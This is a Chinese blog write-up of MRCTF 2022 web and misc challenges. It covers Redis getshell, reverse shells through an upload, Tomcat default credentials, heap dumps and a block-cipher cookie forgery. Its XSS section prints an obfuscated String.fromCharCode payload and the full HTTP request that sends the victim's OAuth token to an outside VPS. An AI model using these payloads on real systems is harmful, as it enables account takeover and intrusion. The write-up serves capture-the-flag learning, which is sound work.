2022MRCTF-wp

最新推荐文章于 2022-10-11 22:58:49 发布
最新推荐文章于 2022-10-11 22:58:49 发布
阅读量651 收藏
点赞数
分类专栏: CTF-Writeup 文章标签: web安全 安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45603443/article/details/124408772
版权

2022MRCTF-wp

Web

Just Hacking

爆出密码foobared
redis getshell 在root目录docker config发现账号密码。
在这里插入图片描述
登录发现私有镜像
在这里插入图片描述
本地运行getflag
在这里插入图片描述

God_of_GPA

笔记页面有dom xss
认证的地方存在xss 可把token发到其他地方
所以页面xss→oauth xss→vps

poc = """window.location=\"http://brtserver.node3.mrctf.fun/oauth/authorize?redirect_uri=http://brtclient.node3.mrctf.fun/login%22%2b1;window.location=%22http://120.26.59.137:901/\""""
poc_l = []
for i in poc:
    poc_l.append(ord(i))
t = ",".join(map(str,poc_l))
print(f"String.fromCharCode({t})")

POST /create HTTP/1.1
Host: brtclient.node3.mrctf.fun
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 936
Origin: http://brtclient.node3.mrctf.fun
Connection: close
Referer: http://brtclient.node3.mrctf.fun/create
Cookie: connect.sid=s%3Ax2L7352YTkIYM7IXQHY_EXhWB4jZFYPh.wcCiDIAad53o0ve1rswago6lshre8k2mKXY53DfOKl8
Upgrade-Insecure-Requests: 1
X-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
title=x&content=<img id="MyImg" name="MyImg" src=http://xonerror="οnerrοr='javascript:eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,49,50,48,46,50,54,46,53,57,46,49,51,55,58,57,48,49,34))"onerror="eval(String.fromCharCode(119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,61,34,104,116,116,112,58,47,47,98,114,116,115,101,114,118,101,114,46,110,111,100,101,51,46,109,114,99,116,102,46,102,117,110,47,111,97,117,116,104,47,97,117,116,104,111,114,105,122,101,63,114,101,100,105,114,101,99,116,95,117,114,105,61,104,116,116,112,58,47,47,98,114,116,99,108,105,101,110,116,46,110,111,100,101,51,46,109,114,99,116,102,46,102,117,110,47,108,111,103,105,110,37,50,50,37,50,98,49,59,119,105,110,100,111,119,46,108,111,99,97,116,105,111,110,61,37,50,50,104,116,116,112,58,47,47,49,50,48,46,50,54,46,53,57,46,49,51,55,58,57,48,49,47,34))"+"al" onerror="javascript:alert(6)">

提交后 vps获得token
在这里插入图片描述
访问

http://brtclient.node3.mrctf.fun/login?token=rFANjznMf279H2WdhX6NEPPWazGPKibk

自动登录 点击查看成绩获取flag
在这里插入图片描述

WebCheckIn

上传处会直接进行php解析 system直接反弹shell
/tmp/upload/exp.php.op下getflag
在这里插入图片描述

Java_mem_shell_Basic

tomcat默认口令
部署war包

ps aux|grep java
jmap -dump:format=b,file=e.bin 27
grep -Rian "MRCTF{"
e.bin:3291:� intersectionCastTypeBinding.�>Z0(Lorg/w3c/dom/Node;)S.���(Ljava/lang/Object;IC)V*.tT�Ljava/lang/management/MemoryUsage;.l�@cacheObjectMaxSize(.l��j2ee_web_services_client_1_1.xsdI.���com/sun/org/apache/xerces/internal/utils/XMLSecurityManager$State.���day of month.��FlowInfo<true: .�M��passesb.��<T:Ljava/lang/Object;>(Ljava/lang/ClassValue$Entry<TT;>;)Ljava/lang/ClassValue$Entry<TT;>;7.���MRCTF{Th1s_i5_4_Web5he11_l04ded_wi7h_JSPL0ader}.�
iArg.�

MRCTF{Th1s_i5_4_Web5he11_l04ded_wi7h_JSPL0ader}

Java_mem_shell_Filter

log4j
重复内存dump

jmap -dump:format=b,file=e.bin 54

在这里插入图片描述

Misc

pdd

一开始的思路,是不断的刷助力(我是拉测速网站放Cookie,队友好像是直接改XFF就可以,委屈住了),然后刷到99.999999999发现,再继续,还爆破了一遍action=lucky时enc看结果会不会有100,蚌住了,没有只会变小再重来。
在这里插入图片描述
确认是后端action=start初始化,action=lucky修改,action=getflag得flag。
后来,想破解加密(我一定是疯了)
总结规律
在这里插入图片描述
得到在测试各种用户名、余额生成的enc,发现这是分组加密,那么其实很显然就是利用分组加密的漏洞(看了*CTF 2021 才发现,但是人家好歹也给了部分源码),但是问题就在,他加密的是哪个字符串,经过测试后(对比对照,总结上述变化的规律,就很清晰的确认,他是把debug中的字符串做加密了。)
然后构造使用。
在这里插入图片描述

POST /lucky.php?action=getFlag HTTP/2
Host: ppd.node3.mrctf.fun
Cookie: PHPSESSID=501bbc1367274320a3fbe47321a6d2fa
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json
Content-Length: 332
Origin: https://ppd.node3.mrctf.fun
Referer: https://ppd.node3.mrctf.fun/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 127.0.0.1
X-Originating-Ip: 127.0.0.1
X-Remote-Ip: 127.0.0.1
X-Remote-Addr: 127.0.0.1
Te: trailers
Connection: close
{"code":200,"debug":"O:4:\"User\":3:{s:8:\"username\";a:1:{i:0;i:590000000000000;}s:5:\"times\";i:0;s:5:\"money\";i:72;}","enc":"SRMr2xR0uuLsQScgoAegYwlz9tod7K3gLTPTcqOGlyY0umqpmC2H3sEcOHJOmzdBs/5+fMCPNhR4pR+FHJWe3eydb1UtueXoodo3h/v8zo9Gh1Qkg/K6xKRBgVNKHksD","times":"10","money":72,"userdb":"user_1a090ffa2d6ea2822dab48dc6b04d9ee"}

Connecting…

结合hint,分析如下
在这里插入图片描述
后续,在obj中翻ascii码,发现f */// 基本都是一样的,除了这几个

f 4d33/5237/6149 6354/4600/6869 6871/6871/6870

在这里插入图片描述
转ascii码有M3R7aIcTFhihqhqhp
在这里插入图片描述
尝试作为密码去解png,发现什么都没有。遂转wav。发现wav隐写
使用MP3Stego解得Base32,得flag。
在这里插入图片描述

FBGTGURXMFEWGVCGFEWSAKZAFVGVEQ2UIZ5VOSKGJFPTEMBSGJPWG33ONZSWG5C7ON2WGY3FONZWM5LMNR4SC7I

在这里插入图片描述

Tip

你是否想要加入一个安全团
拥有更好的学习氛围?
那就加入EDI安全,这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事,我们在为打造安全圈好的技术氛围而努力,这里绝对是你学习技术的好地方。这里门槛不是很高,但师傅们经验丰富,可以带着你一起从基础开始,只要你有持之以恒努力的决心,下一个CTF大牛就是你。
欢迎各位大佬小白入驻,大家一起打CTF,一起进步。
我们在挖掘,不让你埋没!
你的加入可以给我们带来新的活力,我们同样也可以赠你无限的发展空间。
有意向的师傅请联系邮箱root@edisec.net(带上自己的简历,简历内容包括自己的学习方向,学习经历等)

EDI安全
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PatriotCTF 2022 + NahamCon CTF 2022 部分wp
ShenZ的博客
05-02 394
PatriotCTF 2022 + NahamCon CTF 2022 部分wp PatriotCTF 2022 web Rock and Roll Inspector Clouseau Apocalypse Security - 1 Apocalypse Security - 2 Spongebob Locked Excellent Database NahamCon CTF 2022 web Personnel
2022 MRCTF pwn ezbash
weixin_46483787的博客
04-25 534
昨天打的mrctf上的一道题,大概数了一下有十几个解吧,算是签到题 题目给出了一个程序,运行起来之后是一个bash环境,但是里面的文件都是堆上的内存。拿到题目之后首先分析一下文件结构体: 这里写的稍微有点问题,其实标志位是前四位,然后file_name的offset为4到20,20到24是这四个字节没有用,是空的,不过懒得改了,凑活着看吧 其中标志位标识当前chunk是一个文件还是一个文件夹 其他函数具体怎么逆向过程就不说了,好麻烦 如果在逆向上卡住的可以给我发私信,我把逆完的i64发你 然后看下洞在哪:
[MRCTF 2022]web题目复现
cosmoslin的博客
04-27 1513
WEB webcheckin 一个文件上传点,可以上传webshell但是有检测,这里用二进制绕过 <?php class KUYE{ public $DAXW = null; public $LRXV = null; function __construct(){ $this->DAXW = '1100101 1110110 1100001 1101100 101000 100100 1011111 1010000 10011
【MRCTF2022 writeup】
weixin_45751765的博客
04-26 567
1NDEX0x00 前言WebWebCheckInBonusJava_mem_shell_BasicJust HackingJava_mem_shell_FilterMISCCheckinPDD0x01 rethink 0x00 前言 这把打的太菜了… 没出什么有思考的题目,好好复现吧 贴个团队writeup水一下 Web WebCheckIn 文件上传点会解析php 直接system反弹shell 翻到flag Bonus Java_mem_shell_Basic Tomcat默认密码tomcat/to
Real World CTF 2022 两道webwp
yink12138的博客
02-09 5000
Hack into Skynet 给了源码,先审一下 #!/usr/bin/env python3 import flask import psycopg2 import datetime import hashlib from skynet import Skynet app = flask.Flask(__name__, static_url_path='') skynet = Skynet() def skynet_detect(): req = { 'method
all-in-one-wp-migration-file-extension.zip
04-07
《全面解析WordPress迁移插件:All-in-One WP Migration File Extension》 在WordPress的世界里,数据迁移是一项常见的任务,无论是为了网站备份、迁移至新的主机,还是进行开发测试,都需要高效且可靠的工具。All-...
雄迈摄像头模组50HV10PT-WP
08-20
雄迈摄像头模组50HV10PT-WP是一款专为视频监控领域设计的专业设备,其在硬件开发和集成方面具有显著的特点。该模组在众多应用中扮演着核心角色,为用户提供高质量的图像捕捉和实时传输能力。下面将详细探讨这款模组...
all-in-one-wp-migration:多合一WP迁移-无限制importexport
04-09
多合一WP迁移 无限导入/导出All In One WP迁移版本6.77 学分 马里奥·马尔科维奇(Mario Markovic)
NGINX-WP-Rocket:NGINX最佳WordPress性能增强器配置-WP Rocket Rock ..
05-12
-- NGINX-WP-Rocket NGINX-WP-Rocket是缓存插件的配置。 它使Nginx可以直接提供以前缓存的文件,而无需调用WordPress或任何PHP。 它还添加了标头来缓存CSS,JS和媒体,以便通过减少对Web服务器的请求来利用浏览器的...
class-wp.php
06-06
使用WordPress撰写中文文章的时候,如果说在固定链接中选择加入一个%postname%项,生成的url就会因为含有中文而无法被支持,网站显示404。这是需要进行更改后的文件,可以解决问题。
VishwaCTF 2022 部分wp
qq_61768489的博客
03-22 3868
学长推荐的一个相对平易近人的ctf,对我这种菜鸡友好一点, 就想着web要多写几道出来毕竟简单的比赛不常见, 继续加油积累经验吧 My Useless Website 一个最简单的sql 万能密码注入 Stock Bot 注意源码,有hint, 主要就是注意到这个提示了,根据路径直接查Flag Hey Buddy! 这题考点是SSTI ,大佬们也许一眼就看出来了,所谓经验重要性 我这里也就是猜的,然后看到这里get传入name,就很可能 所以先尝试一下...
2022美团CTF个人决赛WP
蚁景网安学院
10-11 2431
2022年美团CTF个人决赛Writeup:解析data的ROP,一点一点还原;提取出来密文,转成64位的;分析gadget都是通过设置rax和参数寄存器,然后call rax触发函数,函数只有4种;流程是一开始将一个32位字符放到bss段中,这个bss贴近我们输入放入bss段的位置,参与到运算...
2022NepCTF部分WP
qq_52988816的博客
08-04 3246
发现是个压缩包套娃,用010看见一个流量包,直接选中数据的硬生生的提出来,虽然损坏了但是流量包可以打开,接下来发现是个键盘流量,用工具一把梭。分别作为p,q,用得到的p,q与c_mod_p,c_mod_q代入CRT方程,x等于c mod p,c 就恒等于 x % mi,.osu后缀,查了下发现是音游的文件,放软件里进行挑战,发现谱面里描出来了flag。根据旁边的如家酒店,我们用谷歌地图搜一下海南地区的如家,发现举例的一个跟图片上一样。B站直播说是最近的模板注入漏洞,就简单搜了一下,还真找到了。...
[HMGCTF2022]wp
Huamang的博客
03-24 4113
WEB Fan website 首先是一个www.zip的源码泄露,是laminas框架 mvc的框架首先就是看路由 在\module\Album\src\Controller\AlbumController.php里面有功能点 <?php namespace Album\Controller; use Album\Model\AlbumTable; use Laminas\Mvc\Controller\AbstractActionController; use Laminas\View\Mode
[MRCTF2020]Xor
qq_37439229的博客
04-13 1387
buuctf [MRCTF2020]Xor 无聊又来水博客了。。。。 打开od看看汇编,cmp edx 0x1b,知道字符串长度为27,之后与自己的序号xor,对比的数在栈里很容易发现 a="MSAWB~FXZ:J:`tQJ\"N@ bpdd}8g" >>> for i in range(len(a)): ... print chr(i^ord(a[i])), 直接出来,...
[MRCTF2020]Shit
sky123博客
01-18 867
main函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v3; // eax int v4; // eax char v5; // al int v6; // eax int v7; // eax int v8; // eax char v10[52]; // [esp+4h] [ebp-38h] BYREF v3 = sub_401890(); std::ostream
2022DASCTF Apr X FATE 防疫挑战赛WP
LaniakeaHarry的博客
04-24 3403
NEFU-NSILIB下Maple战队分队于4月23日10:00 - 18:00所产WriteUp.
【2022 ACTF-wp
qq_45603443的博客
06-28 4072
2022 ACTF wp
BUUCTF [MRCTF2020]CyberPunk
m0_49025459的博客
04-19 764
题目 下完是个可执行程序 把系统的时间改成2020.9.17就行了,再重新启动一下就行了
功能安全-阶段-wp6
最新发布
11-25
WP6是功能安全的阶段之一,根据ISO 26262标准的要求,WP6主要用于实施功能安全的验证和确认,以确保系统能够达到确定的安全性要求。 WP6包括以下主要任务和活动: 1. 验证计划:根据系统的功能安全要求,制定验证...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值